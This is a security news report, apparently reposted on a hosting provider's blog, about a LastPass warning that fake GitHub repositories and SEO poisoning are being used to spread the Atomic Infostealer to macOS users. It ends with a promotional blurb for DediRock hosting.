LastPass has issued a warning regarding an extensive information stealer campaign targeting macOS users through deceptive GitHub repositories that distribute malicious software disguised as legitimate applications.
According to researchers from the LastPass Threat Intelligence, Mitigation, and Escalation (TIME) team, these fraudulent repositories directed unwitting users to download the Atomic Infostealer malware in cases involving LastPass. The campaign impersonates popular applications, including 1Password, Basecamp, Dropbox, Gemini, Hootsuite, Notion, Obsidian, Robinhood, Salesloft, SentinelOne, Shopify, Thunderbird, and TweetDeck, all tailored to attack macOS systems.
The attacks utilize Search Engine Optimization (SEO) poisoning, causing links to these malicious GitHub sites to appear at the top of search results on platforms like Google and Bing. Users are led to believe they are downloading legitimate software by clicking the "Install LastPass on MacBook" button, which ultimately redirects them to a malicious GitHub page.
These GitHub pages, designed to evade detection and takedowns, appeared to be created by multiple GitHub usernames. This method is aimed at prolonging the campaign’s lifespan. The malicious pages guide users with "ClickFix-style instructions" to input terminal commands, which then execute the deployment of the Atomic Stealer malware.
Previously, similar tactics have been used, including malicious Google Ads promoting Homebrew to disseminate a multi-stage dropper through a fraudulent GitHub repository. This campaign could detect virtual machines or analytical environments, decode, and execute system commands to connect with remote servers.
In recent weeks, there has been an increase in threat actors utilizing public GitHub repositories to host malicious payloads and facilitate attacks through tools like Amadey, as well as employing dangling commits related to official repositories to mislead users into downloading harmful programs.
Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.